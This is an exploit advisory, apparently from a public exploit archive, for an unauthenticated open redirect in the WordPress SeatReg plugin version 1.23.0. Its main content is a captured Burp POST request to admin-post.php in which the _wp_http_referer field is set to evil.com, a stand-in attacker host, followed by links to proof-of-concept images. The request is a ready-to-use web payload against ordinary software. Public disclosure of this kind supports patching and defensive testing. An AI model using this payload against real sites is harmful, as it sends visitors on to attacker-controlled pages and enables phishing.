Exploit for WordPress SeatReg 1.23.0 Open Redirect

## https://sploitus.com/exploit?id=PACKETSTORM:167888
# Exploit Title: WordPress Plugin ‘SeatReg’ - Unauthenticated Open  
Redirect  
# Date: 01-08-2022  
# Exploit Author: Mariam Tariq - HunterSherlock  
# Vendor Homepage: https://wordpress.org/plugins/seatreg/  
# Version: 1.23.0  
# Tested on: Firefox  
# Contact me: mariamtariq404@gmail.com  
  
*#Description:*  
  
An Open Redirection is a vulnerability when a web application or server  
uses an unvalidated user-submitted link to redirect the user to a given  
website or page.  
  
*#Example of Burp Request *  
```  
POST /wp-admin/admin-post.php HTTP/1.1  
Host: website.com  
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:103.0)  
Gecko/20100101 Firefox/103.0  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://website.com  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 185  
Origin: https://website.com  
Connection: close  
Cookie: {cookies_here}  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: Navigate  
Sec-Fetch-Site: same-origin  
  
new-registration-name=dedeed&action=seatreg_create_submit&seatreg-admin-nonce=11b1308e8a&*_wp_http_referer=https://evil.com  
<https://evil.com>*&submit=Create+new+registration  
```  
*#PoC Image:*  
  
https://ibb.co/tCZWH0H  
https://ibb.co/5kh299z